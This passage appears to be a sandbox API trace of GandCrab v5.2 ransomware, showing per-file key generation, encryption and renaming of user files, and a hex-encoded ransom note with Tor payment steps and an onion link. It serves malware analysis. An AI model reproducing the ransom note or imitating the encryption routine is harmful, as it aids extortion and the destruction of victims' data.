lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x230 [0093.723] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0093.723] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.724] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0093.724] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.724] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.724] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.724] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f6c0 | out: pbBuffer=0x259f6c0) returned 1 [0093.724] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.725] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.725] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.725] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.725] CryptAcquireContextW (in: phProv=0x259f634, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f634*=0x4c9980) returned 1 [0093.725] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0093.726] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0093.726] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0093.726] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f6e0 | out: pbBuffer=0x259f6e0) returned 1 [0093.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.726] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.726] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.726] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.726] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0093.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.727] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503978) returned 1 [0093.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.727] CryptGetKeyParam (in: hKey=0x503978, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0093.727] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.727] CryptEncrypt (in: hKey=0x503978, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f658*=0x100) returned 1 [0093.728] GetLastError () returned 0x0 [0093.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.728] CryptDestroyKey (hKey=0x503978) returned 1 [0093.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.728] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.728] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.728] CryptAcquireContextW (in: phProv=0x259f628, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f628*=0x4c9980) returned 1 [0093.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.729] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f62c | out: phKey=0x259f62c*=0x503838) returned 1 [0093.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.729] CryptGetKeyParam (in: hKey=0x503838, dwParam=0x8, pbData=0x259f620, pdwDataLen=0x259f624, dwFlags=0x0 | out: pbData=0x259f620*=0x800, pdwDataLen=0x259f624*=0x4) returned 1 [0093.729] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.729] CryptEncrypt (in: hKey=0x503838, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f658*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f658*=0x100) returned 1 [0093.729] GetLastError () returned 0x0 [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.730] CryptDestroyKey (hKey=0x503838) returned 1 [0093.730] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0093.730] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0093.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0093.730] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0093.731] ReadFile (in: hFile=0x230, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f704, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f704*=0x14, lpOverlapped=0x0) returned 1 [0093.744] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xffffffec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0093.745] WriteFile (in: hFile=0x230, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f6e8*=0x14, lpOverlapped=0x0) returned 1 [0093.749] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.749] WriteFile (in: hFile=0x230, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f6e8, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f6e8*=0x21c, lpOverlapped=0x0) returned 1 [0093.751] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.755] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.755] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.755] CloseHandle (hObject=0x230) returned 1 [0093.756] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\ntuser.ini.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\ntuser.ini.titwmvjl"), dwFlags=0x1) returned 1 [0093.757] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.757] FindNextFileW (in: hFindFile=0x503678, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0093.757] lstrcmpW (lpString1="OneDrive", lpString2=".") returned 1 [0093.757] lstrcmpW (lpString1="OneDrive", lpString2="..") returned 1 [0093.757] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="OneDrive" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive" [0093.757] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\") returned="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\" [0093.757] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0093.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.758] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0093.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.758] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0093.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.758] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0093.758] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0093.758] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0093.758] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.759] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0093.759] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\\\TITWMVJL-DECRYPT.txt") returned 52 [0093.759] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\OneDrive\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\onedrive\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0093.760] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6